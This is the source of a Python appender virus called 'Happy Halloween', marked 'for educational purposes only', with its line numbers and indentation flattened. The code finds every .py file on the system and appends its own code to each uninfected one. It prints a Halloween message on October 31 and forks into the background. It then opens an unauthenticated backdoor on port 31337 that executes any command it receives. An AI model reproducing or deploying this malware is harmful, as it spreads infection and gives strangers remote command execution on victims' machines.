1# Happy Halloween ~ (A python appender VX) 2# Finds all python scripts on a system, infects them 3# with the VX if not infected, payload on infected scripts 4# say "Happy Halloween" if run on October 31st. Virus 5# opens a backdoor on port 31337 which can be used to 6# send commands when an infected script has been executed. 7# F O R E D U C A T I O N A L P U R P O S E S O N L Y 8#!x 9import glob #!x 10import sys #!x 11import os #!x 12import socket #!x 13from datetime import datetime #!x 14from string import*#!x 15date = datetime.now()#!x 16if date.month ==10:#!x 17if date.day ==31:#!x 18print"Happy Halloween!"#!x 19pid = os.fork()#!x 20if pid >0:#!x 21 sys.exit(0)#!x 22cmd ='find /. -name "*.py" -print 2>/dev/null'#!x 23for Files in os.popen(cmd).readlines():#!x 24 Files = Files[:-1]#!x 25try:#!x 26 vCode =open(__file__,'r')#!x 27 victim =open(Files,'r')#!x 28 readvictim = victim.read()#!x 29iffind(readvictim,"pRdElKa") == -1:#!x 30 victim =open(Files,'a')#!x 31for code in vCode.readlines():#!x 32if("#!x")in code:#!x 33 vCode.close()#!x 34 mycode=(code)#!x 35 victim.write(mycode)#!x 36exceptIOError:#!x 37 a =1#!x 38pid = os.fork()#!x 39if pid >0:#!x 40 sys.exit(0)#!x 41try:#!x 42 s = socket.socket()#!x 43 s.bind(("0.0.0.0",31337))#!x 44 s.listen(1)#!x 45except socket.error, (value, message):#!x 46 sys.exit(0)#!x 47while1:#!x 48(cli,add) = s.accept()#!x 49 info = {"platform":sys.platform,"version":sys.version} #!x 50 cli.send("".join(("You are connected to shell\r\n", info["platform"],info["version"],"\r\n")))#!x 51while1:#!x 52 data = cli.recv(1024)#!x 53 resp = os.popen(data).readlines()#!x 54 cli.send("".join(resp))#!x